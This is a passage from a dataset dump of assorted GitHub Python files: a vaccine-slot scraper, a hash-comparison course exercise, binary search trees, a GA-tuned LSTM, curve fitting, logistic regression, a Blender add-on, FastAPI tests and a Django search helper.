\"socks5://127.0.0.1:9050\",\n \"https\": \"socks5://127.0.0.1:9050\",\n }\n DEFAULT_CLIENT = session # type: ignore\nelse:\n DEFAULT_CLIENT = httpx.Client(timeout=timeout)\n\nlogger = logging.getLogger(\"scraper\")\n\n\ndef get_possible_dose_numbers(vaccine_list: list):\n if not vaccine_list:\n return []\n if any([vaccine in BOOSTER_VACCINES for vaccine in vaccine_list]):\n return [1, 2, 3]\n elif any([vaccine in BOOSTER_ONLY_VACCINES for vaccine in vaccine_list]):\n return [3]\n return [1, 2]\n\n\n@Profiling.measure(\"mesoigner_slot\")\ndef fetch_slots(request: ScraperRequest, creneau_q=DummyQueue) -> Optional[str]:\n if not PLATFORM_ENABLED:\n return None\n # Fonction principale avec le comportement \"de prod\".\n mesoigner = MesoignerSlots(client=DEFAULT_CLIENT, creneau_q=creneau_q)\n return mesoigner.fetch(request)\n\n\nclass MesoignerSlots:\n def __init__(\n self,\n creneau_q=DummyQueue,\n client: httpx.Client = None,\n ):\n self._client = DEFAULT_CLIENT if client is None else client\n self.creneau_q = creneau_q\n self.lieu = None\n\n def found_creneau(self, creneau):\n self.creneau_q.put(creneau)\n\n def fetch(self, request: ScraperRequest) -> Optional[str]:\n gid = request.center_info.internal_id\n platform = request.center_info.plateforme\n center_id = gid.split(platform)[-1]\n start_date = request.get_start_date()\n\n self.lieu = Lieu(\n plateforme=Plateforme[PLATFORM.upper()],\n url=request.url,\n location=request.center_info.location,\n nom=request.center_info.nom,\n internal_id=f\"mesoigner{request.internal_id}\",\n departement=request.center_info.departement,\n lieu_type=request.practitioner_type,\n metadata=request.center_info.metadata,\n )\n\n centre_api_url = MESOIGNER_APIs.get(\"slots\", \"\").format(id=center_id, start_date=start_date)\n response = self._client.get(centre_api_url, headers=MESOIGNER_HEADERS)\n request.increase_request_count(\"slots\")\n\n if response.status_code == 403:\n request.increase_request_count(\"error\")\n raise Blocked403(PLATFORM, centre_api_url)\n\n response.raise_for_status()\n rdata = response.json()\n\n first_availability = self.get_appointments(request, rdata)\n if self.lieu and first_availability is None:\n self.found_creneau(PasDeCreneau(lieu=self.lieu))\n return first_availability\n\n def get_appointments(self, request: ScraperRequest, slots_api):\n appointments_number = 0\n first_availability = None\n\n if slots_api.get(\"total\"):\n appointments_number += int(slots_api.get(\"total\", 0))\n\n if len(slots_api.get(\"slots\", [])) == 0:\n return None\n\n start_date = request.get_start_date()\n\n for day in slots_api.get(\"slots\", []):\n\n for day_date, appointments_infos in day.items():\n if len(appointments_infos) == 0:\n continue\n\n for one_appointment_info in appointments_infos:\n appointment_exact_date = one_appointment_info[\"slot_beginning\"]\n\n dose_ranks = get_possible_dose_numbers(one_appointment_info[\"available_vaccines\"])\n\n self.found_creneau(\n Creneau(\n horaire=dateutil.parser.parse(appointment_exact_date),\n reservation_url=request.url,\n dose=dose_ranks,\n type_vaccin=one_appointment_info[\"available_vaccines\"],\n lieu=self.lieu,\n )\n )\n if first_availability is None or appointment_exact_date < first_availability:\n first_availability = appointment_exact_date\n\n for vaccine in one_appointment_info[\"available_vaccines\"]:\n request.add_vaccine_type(get_vaccine_name(vaccine))\n\n request.update_appointment_count(request.appointment_count + appointments_number)\n\n return first_availability\n\n\ndef center_iterator(client=None) -> Iterator[Dict]:\n if not PLATFORM_ENABLED:\n logger.warning(f\"{PLATFORM.capitalize()} scrap is disabled in configuration file.\")\n return []\n\n session = CacheControl(requests.Session(), cache=FileCache(\"./cache\"))\n\n if client:\n session = client\n try:\n url = f'{get_config().get(\"base_urls\").get(\"github_public_path\")}{get_conf_outputs().get(\"centers_json_path\").format(PLATFORM)}'\n response = session.get(url)\n # Si on ne vient pas des tests unitaires\n if not client:\n if response.from_cache:\n logger.info(f\"Liste des centres pour {PLATFORM} vient du cache\")\n else:\n logger.info(f\"Liste des centres pour {PLATFORM} est une vraie requête\")\n\n data = response.json()\n logger.info(f\"Found {len(data)} {PLATFORM.capitalize()} centers (external scraper).\")\n for center in data:\n yield center\n except Exception as e:\n logger.warning(f\"Unable to scrape {PLATFORM} centers: {e}\")\n","repo_name":"CovidTrackerFr/vitemadose","sub_path":"scraper/mesoigner/mesoigner.py","file_name":"mesoigner.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"32"} +{"seq_id":"7421624695","text":"import sys\nfrom Crypto.Hash import SHA256\n\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print('Need 3 files')\n sys.exit(1)\n\n with open(sys.argv[1]) as f:\n firFile = f.read().strip()\n with open(sys.argv[2]) as f:\n secFile = f.read().strip()\n \n h1 = SHA256.new(firFile.decode('ascii'))\n firHash = h1.hexdigest()\n firHash = bin(int(firHash, 16))[2:]\n \n h2 = SHA256.new(secFile.decode('ascii'))\n secHash = h2.hexdigest()\n secHash = bin(int(secHash, 16))[2:]\n \n distance = 0\n for index in range(len(firHash)):\n \tif firHash[index] == secHash[index]:\n \t\tdistance += 1\n\t\n output = open(sys.argv[3], 'w')\n output.write(hex(distance)[2:])\n output.close()\n","repo_name":"Thomashqy/UIUC-CS461","sub_path":"Crypto/sol_3.1.3.1.py","file_name":"sol_3.1.3.1.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13839485794","text":"import os\n# Import the CODE_EXTENSIONS variable from the config module\nfrom config import CODE_EXTENSIONS\n\n# Specify the directory containing the code files\ncode_directory = r'C:\\Users\\green\\Downloads\\hw4_template'\noutput_file = 'combined_code_files.txt'\n\n# Define a function to filter the desired code file extensions\ndef is_code_file(file_name):\n return any(file_name.endswith(extension) for extension in CODE_EXTENSIONS)\n\n# Combine the contents of all code files into a single text file\nwith open(output_file, 'w') as outfile:\n # Iterate through the directory tree\n for root, _, files in os.walk(code_directory):\n # Iterate through each file in the directory\n for file_name in files:\n # Check if the file has an extension matching those in the CODE_EXTENSIONS list\n if is_code_file(file_name):\n # Construct the absolute and relative paths of the file\n file_path = os.path.join(root, file_name)\n relative_path = os.path.relpath(file_path, code_directory)\n \n # Write the file name and separator to the output file\n outfile.write(f\"File: {relative_path}\\n\")\n outfile.write(\"=====================================\\n\")\n \n # Read the content of the file and write it to the output file\n with open(file_path, 'r') as infile:\n outfile.write(infile.read())\n # Add line breaks between files\n outfile.write(\"\\n\\n\")\n","repo_name":"ChristianGreen-OSU/GPT-Helper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16261806670","text":"class BST:\n def __init__(self, parent, k):\n self.parent = parent\n self.key = k\n self.left = None\n self.right = None\n\n \"\"\"Insert node into the BST\"\"\"\n\n def insert(self, node):\n if node is None:\n return\n if node.key < self.key:\n if self.left is None:\n node.parent = self\n self.left = node\n else:\n return self.left.insert(node)\n if node.key > self.key:\n if self.right is None:\n node.parent = self\n self.right = node\n else:\n return self.right.insert(node)\n\n \"\"\"min value of tree of sub tree rooted at node\"\"\"\n\n def find_min(self):\n if self.left is None:\n return self.key\n else:\n return self.left.find_min()\n \"\"\"finds & returns the node with the key k\"\"\"\n\n\n def find(self, k):\n if k == self.key:\n return self\n if k < self.key:\n if self.left is None:\n return None\n else:\n return self.left.find(k)\n if k > self.key:\n if self.right is None:\n return None\n else:\n return self.right.find(k)\n\n \"\"\"Returns the node with next largest key to self\"\"\"\n def next_larger(self):\n current = self.find(self.key)\n\n if current.right is not None:\n right_min = current.right.find_min()\n return current.find(right_min)\n\n elif current.parent is not None:\n while current is current.parent.right:\n current = current.parent\n return current.parent\n else:\n return \"None: Single Node Tree\"\n\n \"\"\"Delete and returns the node from the BST.\n If a key is passed, the find the node with the key, delete the node and then return the node\"\"\"\n def delete(self):\n \"\"\"case 1: node to be deleted has no children + case 2: Has only one child\"\"\"\n if self.left is None or self.right is None:\n if self is self.parent.left:\n self.parent.left = self.left or self.right\n else:\n \"\"\"self is self.parent.right\"\"\"\n self.parent.right = self.left or self.right\n else:\n \"\"\"case 3: two children are present\"\"\"\n next_largest = self.next_larger()\n self.key, next_largest.key = next_largest.key, self.key\n next_largest.delete()\n\n\n\n\n\"\"\"Prints the node in tree in low to high\"\"\"\ndef inOrder(node):\n if node is None:\n return\n inOrder(node.left)\n print(node.key)\n inOrder(node.right)\n\n\nif __name__ == \"__main__\":\n nodes_to_be_inserted = [52, 55, 53, 56, 37, 30, 42, 40, 41, 44]\n \"\"\"RHS of Tree\"\"\"\n root = BST(None, 50)\n node1 = BST(root, 52)\n node2 = BST(node1, 55)\n node3 = BST(node2, 53)\n node4 = BST(node2, 56)\n \"\"\"LHS of Tree\"\"\"\n node5 = BST(root, 37)\n node6 = BST(node5, 30)\n node7 = BST(node5, 42)\n node8 = BST(node7, 41)\n node9 = BST(node7, 44)\n node10 = BST(node8, 40)\n\n root.insert(node1)\n root.insert(node2)\n root.insert(node3)\n root.insert(node4)\n root.insert(node5)\n root.insert(node6)\n root.insert(node7)\n root.insert(node8)\n root.insert(node9)\n root.insert(node10)\n\n print(\"\"\"print a node object- e.g. Node1\"\"\")\n print(node1)\n print(\"\"\"print a node's key - e.g. Node1's key\"\"\")\n print(node1.key)\n print(\"Print ordered nodes in BST\")\n inOrder(root)\n print(\"**** Min of a given node BST Tree ****\")\n print(node2.find_min())\n print(\"**** find a node with search key ****\")\n print(root.find(42).key)\n\n print(\"**** root key ****\")\n print(root.key)\n print(\"**** find a node with next_larger key ****\")\n print(node7.next_larger().key)\n\n print(\"****Delete a Node with a given key****\")\n node7.delete()\n print(\"*** Print order of rooted node ***\")\n print(node7.key)\n inOrder(node7)\n\n","repo_name":"pradeepramamurthi/intro-to-algo","sub_path":"lecture-5/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25211399010","text":"# 0131\r\n# 出处:https://blog.csdn.net/Vertira/article/details/122403571\r\n\r\n# 本章节GA_LSTM是关于遗传算法优化lstm算法的层数和全连接层数及每层神经元的个数\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport matplotlib as plt\r\nfrom tensorflow.keras.layers import Input, LSTM, Dropout, Dense, BatchNormalization\r\nfrom tensorflow.keras import optimizers, losses, metrics, models, Sequential\r\n\r\n'''\r\n本文的主要内容如下:\r\n1.本文章是对lstm网络的优化,优化的参数主要有:lstm层的层数,lstm隐藏层的神经元个数,dense层的层数,dense层的神经元个数\r\n2.本文章利用的是遗传算法进行优化,其中编码形式并未采用2进制编码,只是将2数组之间的元素交换位置。\r\n3.本文的lstm和dense的层数都在1-3的范围内,因为3层的网络足以拟合非线性数据\r\n4.程序主要分为2部分,第一部分是lstm网络的设计,第二部分是遗传算法的优化。\r\n5.代码的解释已详细写在对应的部分,有问题的同学可以在评论区进行交流\r\n'''\r\n\r\n\r\n# 导入数据集,本文用的是mnist手写数据集,该数据主要是对手写体进行识别0-9的数字\r\ndef load_data():\r\n # 从tensorflow自带的数据集中导入数据\r\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\r\n # 主要进行归一化操作\r\n x_train, x_test = x_train / 255.0, x_test / 255.0\r\n return x_train, x_test, y_test, y_train\r\n\r\n\r\n# 定义LSTM模型\r\ndef lstm_mode(inputs, units_num, sequences_state):\r\n # input主要是用来定义lstm的输入,input的一般是在第一层lstm层之前,units_num即是隐藏层神经元个数,sequence_state即是lstm层输出的方式\r\n lstm = LSTM(units_num, return_sequences=sequences_state)(inputs)\r\n print(\"lstm:\", lstm.shape)\r\n return lstm\r\n\r\n\r\n# 定义全连接层、BN层\r\ndef dense_mode(input, units_num):\r\n # 这里主要定义全连接层的输入,input参数定义dense的第一次输入,units_num代表隐藏层神经元个数\r\n # 这里定义全连接层,采用L2正则化来防止过拟合,激活函数为relu\r\n dense = Dense(units_num, kernel_regularizer=tf.keras.regularizers.l2(0.001), activation='relu')(input)\r\n print(\"dense:\", dense.shape)\r\n # 定义dropout层,概率为0.2\r\n drop_out = Dropout(rate=0.2)(dense)\r\n # 定义BN层,可以理解为是隐藏层的标准化过程\r\n dense_bn = BatchNormalization()(drop_out)\r\n return dense, drop_out, dense_bn\r\n\r\n\r\n# 这里定义的即是评价lstm效果的函数——也是遗传算法的适应度函数\r\ndef aim_function(x_train, y_train, x_test, y_test, num):\r\n # 这里传入数据和参数数组num,num保存了需要优化的参数\r\n # 这里我们设置num数组中num[0]代表lstm的层数。\r\n lstm_layers = num[0]\r\n # num[2:2 + lstm_layers]分别为lstm各层的神经元个数,有同学不知道num(1)去哪了(num(1)为全连接层的层数)\r\n lstm_units = num[2:2 + lstm_layers]\r\n # 将num\r\n lstm_name = list(np.zeros((lstm_layers,)))\r\n # 设置全连接层的参数\r\n # num(1)为全连接的参数\r\n lstm_dense_layers = num[1]\r\n # 将lstm层之后的地方作为全连接层各层的参数\r\n lstm_dense_units = num[2 + lstm_layers: 2 + lstm_layers + lstm_dense_layers]\r\n #\r\n lstm_dense_name = list(np.zeros((lstm_dense_layers,)))\r\n lstm_dense_dropout_name = list(np.zeros((lstm_dense_layers,)))\r\n lstm_dense_batch_name = list(np.zeros((lstm_dense_layers,)))\r\n # 这主要是定义lstm的第一层输入,形状为训练集数据的形状\r\n inputs_lstm = Input(shape=(x_train.shape[1], x_train.shape[2]))\r\n\r\n # 这里定义lstm层的输入(如果为第一层lstm层,则将初始化的input输入,如果不是第一层,则接受上一层输出的结果)\r\n for i in range(lstm_layers):\r\n if i == 0:\r\n inputs = inputs_lstm\r\n else:\r\n inputs = lstm_name[i - 1]\r\n if i == lstm_layers - 1:\r\n sequences_state = False\r\n else:\r\n sequences_state = True\r\n # 通过循环,我们将每层lstm的参数都设计完成\r\n lstm_name[i] = lstm_mode(inputs, lstm_units[i], sequences_state=sequences_state)\r\n\r\n # 同理设计全连接层神经网络的参数\r\n for i in range(lstm_dense_layers):\r\n if i == 0:\r\n inputs = lstm_name[lstm_layers - 1]\r\n else:\r\n inputs = lstm_dense_name[i - 1]\r\n\r\n lstm_dense_name[i], lstm_dense_dropout_name[i], lstm_dense_batch_name[i] = dense_mode(inputs, units_num=\r\n lstm_dense_units[i])\r\n\r\n # 这里是最后一层:分类层,softmax\r\n outputs_lstm = Dense(10, activation='softmax')(lstm_dense_batch_name[lstm_dense_layers - 1])\r\n print(\"last_dense\", outputs_lstm.shape)\r\n\r\n # 利用函数式调试神经网络,调用inputs和outputs之间的神经网络\r\n LSTM_model = tf.keras.Model(inputs=inputs_lstm, outputs=outputs_lstm)\r\n # 编译模型\r\n LSTM_model.compile(optimizer=optimizers.Adam(),\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n print(\"训练集形状\", x_train.shape)\r\n\r\n history = LSTM_model.fit(x_train, y_train, batch_size=32, epochs=1, validation_split=0.1, verbose=1)\r\n # 验证模型,model.evaluate返回的值是一个数组,其中score[0]为loss,score[1]为准确度\r\n acc = LSTM_model.evaluate(x_test, y_test, verbose=0)\r\n return acc[1]\r\n\r\n","repo_name":"guan-zi/LSTM-PSO-GAS-GA","sub_path":"一些代码实例/LSTM+GA-PyCharm/GA_LSTM_lstm.py","file_name":"GA_LSTM_lstm.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41775047000","text":"import numpy as np\r\nfrom lmfit import Model\r\nimport matplotlib.pyplot as plt\r\n\r\npath = r'D:\\data\\20191206\\141911_power_sweep_evaporated_drum_device\\141911_power_sweep_evaporated_drum_device.dat'\r\npower, fr, _, _, a ,_ = np.loadtxt(path, unpack=True)\r\n\r\npw = np.linspace(power[10],power[-60],71)\r\nfreq = np.split(fr, 71)[0]\r\n\r\ndata = np.split(a,71)\r\n\r\n\r\ndef normalizedS11(f, f0, ke, ki):\r\n\treturn 1-ke/((ki+ke)/2+1j*(f-f0))\r\n\r\ndef S11(f, f0, ke, ki, norm):\r\n\treturn norm*normalizedS11(f, f0, ke, ki)\r\n\r\ndef S11r(f, f0, ke, ki, norm):\r\n\treturn norm*np.abs(normalizedS11(f, f0, ke, ki))\r\n\r\nm = Model(S11r)\r\n\r\nk_list = []\r\nke_list= []\r\nfor i in np.arange(70):\r\n\tfguess = freq[np.argmin(data[i])]\r\n\tkeguess = 1e5\r\n\tkiguess = 1e5\r\n\tnorm_guess = np.min(data[i])\r\n\t# # print(i)\r\n\tdata2fit = data[i]\r\n\tf2fit = freq\r\n\tresult = m.fit(data2fit, f= f2fit, f0 = fguess, ke = keguess, ki = kiguess, norm = norm_guess)\r\n\tplt.plot(f2fit, data2fit,'-ro', f2fit, result.best_fit, '-g')\r\n\tplt.title(str(pw[i])+' '+'dBm')\r\n\tplt.savefig(r'D:\\data\\20191206\\141911_power_sweep_evaporated_drum_device\\figs\\%f.png'%i, transparent = True)\r\n\tplt.clf()\r\n\t# print(result.params['ke'].value)\r\n\tk_list = np.append(k_list, (pw[i], result.params['ke'].value, result.params['ki'].value))\r\n\tke_list= np.append(ke_list, result.params['ki'].value)\r\nwith open('list.txt', 'w') as f:\r\n for item in k_list:\r\n f.write(\"%s\\n\" % item)\r\nprint(len(pw))\r\n# plt.clf()\r\nplt.plot(pw[:70], ke_list, '-ro')\r\nplt.grid()\r\nplt.show()\r\n\r\n","repo_name":"svmjdr/qtlab","sub_path":"scripts/Drums/kvspower.py","file_name":"kvspower.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34960096005","text":"# file: setup.py\n# content: setup file for pyvigi package\n# created: 2020 septemeber 27 Sunday\n# modified:\n# modification:\n# author: roch schanen\n# comment:\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pyvigi\",\n version=\"0.0.4\",\n author=\"Roch Schanen\",\n author_email=\"r.schanen@lancaster.ac.uk\",\n description=\"PYthon Vitual Instrument Graphic Interface\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/RochSchanen/pyvigi_dev\",\n packages = ['pyvigi'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=['wxpython'],\n python_requires='>=3.8'\n)\n","repo_name":"RochSchanen/pyvigi_dev","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26346441798","text":"import copy, math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Decision_Boundary import plot_data, sigmoid\n\nX_train = np.array([[0.5, 1.5], [1,1], [1.5, 0.5], [3, 0.5], [2, 2], [1, 2.5]])\ny_train = np.array([0, 0, 0, 1, 1, 1])\n\nfig,ax = plt.subplots(1,1,figsize=(4,4))\nplot_data(X_train, y_train, ax)\n\nax.axis([0, 4, 0, 3.5])\nax.set_ylabel('$x_1$', fontsize=12)\nax.set_xlabel('$x_0$', fontsize=12)\nplt.show()\n\ndef log_1pexp(x, maximum=20):\n out = np.zeros_like(x,dtype=float)\n i = x <= maximum\n ni = np.logical_not(i)\n\n out[i] = np.log(1 + np.exp(x[i]))\n out[ni] = x[ni]\n return out\n\ndef compute_cost_logistic(X, y, w, b, lambda_=0, safe=False):\n m,n = X.shape\n cost = 0.0\n for i in range(m):\n z_i = np.dot(X[i], w) + b # (n,)(n,) or (n,) ()\n f_wb_i = sigmoid(z_i) # (n,)\n cost += -y[i] * np.log(f_wb_i) - (1 - y[i]) * np.log(1 - f_wb_i) # scalar\n cost = cost / m\n\n reg_cost = 0\n if lambda_ != 0:\n for j in range(n):\n reg_cost += (w[j] ** 2) # scalar\n reg_cost = (lambda_ / (2 * m)) * reg_cost\n\n return cost + reg_cost\n\n\ndef compute_gradient_logistic(X, y, w, b):\n m, n = X.shape\n dj_dw = np.zeros((n,)) # (n,)\n dj_db = 0.\n\n for i in range(m):\n f_wb_i = sigmoid(np.dot(X[i], w) + b) # (n,)(n,)=scalar\n err_i = f_wb_i - y[i] # scalar\n for j in range(n):\n dj_dw[j] = dj_dw[j] + err_i * X[i, j] # scalar\n dj_db = dj_db + err_i\n dj_dw = dj_dw / m # (n,)\n dj_db = dj_db / m # scalar\n\n return dj_db, dj_dw\n\nX_tmp = np.array([[0.5, 1.5], [1,1], [1.5, 0.5], [3, 0.5], [2, 2], [1, 2.5]])\ny_tmp = np.array([0, 0, 0, 1, 1, 1])\nw_tmp = np.array([2.,3.])\nb_tmp = 1.\ndj_db_tmp, dj_dw_tmp = compute_gradient_logistic(X_tmp, y_tmp, w_tmp, b_tmp)\nprint(f\"dj_db: {dj_db_tmp}\" )\nprint(f\"dj_dw: {dj_dw_tmp.tolist()}\" )\n\n\ndef gradient_descent(X, y, w_in, b_in, alpha, num_iters):\n J_history = []\n w = copy.deepcopy(w_in) # avoid modifying global w within function\n b = b_in\n\n for i in range(num_iters):\n # Calculate the gradient and update the parameters\n dj_db, dj_dw = compute_gradient_logistic(X, y, w, b)\n\n # Update Parameters using w, b, alpha and gradient\n w = w - alpha * dj_dw\n b = b - alpha * dj_db\n\n # Save cost J at each iteration\n if i < 100000: # prevent resource exhaustion\n J_history.append(compute_cost_logistic(X, y, w, b))\n\n # Print cost every at intervals 10 times or as many iterations if < 10\n if i % math.ceil(num_iters / 10) == 0:\n print(f\"Iteration {i:4d}: Cost {J_history[-1]} \")\n\n return w, b, J_history # return final w,b and J history for graphing\n\nw_tmp = np.zeros_like(X_train[0])\nb_tmp = 0.\nalph = 0.1\niters = 10000\n\nw_out, b_out, _ = gradient_descent(X_train, y_train, w_tmp, b_tmp, alph, iters)\nprint(f\"\\nupdated parameters: w:{w_out}, b:{b_out}\")\n\nfig,ax = plt.subplots(1,1,figsize=(5,4))\n\n\n# Plot the original data\nax.set_ylabel(r'$x_1$')\nax.set_xlabel(r'$x_0$')\nax.axis([0, 4, 0, 3.5])\nplot_data(X_train,y_train,ax)\n\n","repo_name":"ozgeguney/Machine-Learning","sub_path":"Gradient_Descent_Log_Reg.py","file_name":"Gradient_Descent_Log_Reg.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4879628391","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: A Tree\n @return: Inorder in ArrayList which contains node values.\n \"\"\"\n def inorderTraversal(self, root):\n stack = []\n result = []\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n node = stack.pop()\n result.append(node.val)\n root = node.right\n return result\n","repo_name":"ZhouningMan/LeetCodePython","sub_path":"tree/BinaryTreeTraversal.py","file_name":"BinaryTreeTraversal.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2902430063","text":"\nfrom ..Plugin import Plugin\nfrom .CanCreateText import CanCreateText\nfrom bpy.types import Operator\nimport bpy\n\n\nclass CreateTextOperator(Operator, Plugin, CanCreateText):\n \"\"\"Turn an empty object into font text object\"\"\"\n bl_idname = \"object.font_create_text\"\n bl_label = \"Create Text\"\n\n def execute(self, context):\n # type: (bpy.ContextType) -> set[bpy.Literal[\"FINISHED\"]]\n self.create_text()\n return {'FINISHED'}\n\n def create_text(self):\n o = bpy.context.object\n if o.type != \"EMPTY\" or o.empty_display_type != \"PLAIN_AXES\":\n return\n if not 'font_text' in o:\n o['font_text'] = \"\"\n if not 'font_text_start_frame' in o:\n o['font_text_start_frame'] = 0\n if not 'font_text_line_width' in o:\n o['font_text_line_width'] = 25\n if not 'font_text_character_spacing' in o:\n o['font_text_character_spacing'] = 10\n if not 'font_text_top_line_location' in o:\n o['font_text_top_line_location'] = 0\n if not 'font_text_bottom_line_location' in o:\n o['font_text_bottom_line_location'] = -17\n if not 'font_text_word_based_frame' in o:\n o['font_text_word_based_frame'] = True\n if not 'font_text_use_current_frame_as_start' in o:\n o['font_text_use_current_frame_as_start'] = True\n if not 'font_text_end' in o:\n text_end = {\n 'type': \"OFFSET\",\n 'end_frame': 0,\n 'length': 1,\n 'end_offset': 0\n } # type: bpy.TextEndType\n o['font_text_end'] = text_end\n return","repo_name":"mmulet/font-game-engine","sub_path":"blender/fontemon_blender_addon/CreateText/CreateTextOperator.py","file_name":"CreateTextOperator.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"31"} +{"seq_id":"8791972377","text":"import pytest\nfrom fastapi.testclient import TestClient\n\nfrom sqlmodel import Session, SQLModel, create_engine\nfrom sqlmodel.pool import StaticPool\n\nfrom app.main import app, create_db_and_tables\n\nclient = TestClient(app)\n\ndef setup_module(module):\n create_db_and_tables()\n\n\n\ndef test_sales_performance_route():\n payload = {\n \"quarters\": \"Q1\",\n \"category\": \"Revenue\",\n \"subcategory\": \"Sales Target\",\n \"change_made\": \"Team Targets\",\n \"report_made\": \"Sales Targets\",\n \"output\": \"Sales Targets\",\n \"name\" : \"Julie\",\n \"metric_calculations\": \"Sales Targets\",\n \"individual_performance\": \"Sales Targets\",\n \"team_performance\": \"Sales Targets\",\n \"customer_behavior\": \"Sales Targets\",\n \n }\n headers = {\n \"Content-Type\": \"application/json\"\n}\n response = client.post(\"/salesperformance\", json=payload, headers=headers)\n print(response.json())\n\n assert response.status_code == 200\n\n\ndef test_get_sales_performance():\n response = client.get(\"/salesperformance\")\n assert response.status_code == 200\n assert isinstance(response.json(), list)\n\n \n \ndef test_sales_performance_route_invalid_data():\n payload = {\n # Missing \"quarters\", \"category\", and other fields\n \"change_made\": \"Team Targets\",\n \"report_made\": \"Sales Targets\",\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n response = client.post(\"/salesperformance\", json=payload, headers=headers)\n assert response.status_code == 422 # 422 Unprocessable Entity\n\n\n\n\n\n\n\n","repo_name":"IulianaFilip/SalesPerformance","sub_path":"backend/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39674049406","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Q\nimport re\n\n\ndef normalize_query(query_string,\n findterms=re.compile(r'\"([^\"]+)\"|(\\S+)').findall,\n normspace=re.compile(r'\\s{2,}').sub):\n return [normspace(' ', (t[0] or t[1]).strip()) for t in findterms(query_string)]\n\n\ndef get_query(query_string, search_fields):\n query = None # Query to search for every search term\n terms = normalize_query(query_string)\n for term in terms:\n or_query = None # Query to search for a given term in each field\n for field_name in search_fields:\n q = Q(**{\"%s__icontains\" % field_name: term})\n if or_query is None:\n or_query = q\n else:\n or_query = or_query | q\n if query is None:\n query = or_query\n else:\n query = query & or_query\n return query","repo_name":"ericls/niji","sub_path":"niji/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"31"} +{"seq_id":"70575457369","text":"# coding: utf8\nfrom zjyw_utils import *\nimport datetime\nwith myapi.connection() as con:\n cur = con.cursor()\n# s='set names utf8'\n# cur.execute( s )\n# sql = \"insert into AgentWarn ( warn_detail, warn_level, warn_suggest, warn_isclose, warn_time_join, warn_type, warn_agent, warn_task )values('烦烦烦','5','sss收拾收拾','1','www','1','www','www')\"\n# print( \"阿瑟大时代======%s\"%sql )\n# sql_id = \"select * from AgentTask where task_id='10001'\"\n# cur.execute(sql_id)\n# rs = myapi.sql_execute(cur, sql_id)\n# ls=[]\n# while rs.next():\n# rs_lst = rs.to_dict()\n# ls.append(rs_lst)\n# print( \"=========%s\"%repr(ls) )\n \"\"\"\n 结果集:\n [{'task_start_time': '20160625011010', 'task_time_join': '20160621102320', 'task_type': '1', 'task_module': '1', 'task_id': '10001', 'task_day': None, 'task_scheme_time': '2016-04-06 20:33:20', 'task_real_time': '2016-07-26 06:36:47', 'task_group': '1', 'task_agent': '10000001', 'task_time': '16:06:00', 'task_result': '\\xe6\\x9c\\x89\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe9\\xa1\\xb9\\xe6\\x9c\\xaa\\xe9\\x80\\x9a\\xe8\\xbf\\x87\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe6\\x9c\\x89\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe9\\xa1\\xb9\\xe6\\x9c\\xaa\\xe6\\xa0\\xb8\\xe6\\x9f\\xa5', 'task_circle': '1', 'task_state': '1', 'task_user_join': 'zjyw', 'task_name': '\\xe5\\x9f\\xba\\xe4\\xba\\x8e\\xe5\\xb7\\xa5\\xe4\\xbf\\xa1\\xe9\\x83\\xa8\\xe5\\x9f\\xba\\xe7\\xba\\xbf\\xe7\\x9a\\x84\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe4\\xbb\\xbb\\xe5\\x8a\\xa1', 'task_detail': '\\xe6\\xa3\\x80\\xe6\\xb5\\x8b\\xe4\\xb8\\xbb\\xe6\\x9c\\xba', 'task_week': '3'}]\n \"\"\"\n# sql_id = \"select * from AgentTask\"\n# cur.execute(sql_id)\n# rs = cur.fetchone()\n# print( \"=========%s\"%repr(rs) )\n \"\"\"\n 结果集: \n ('10001', 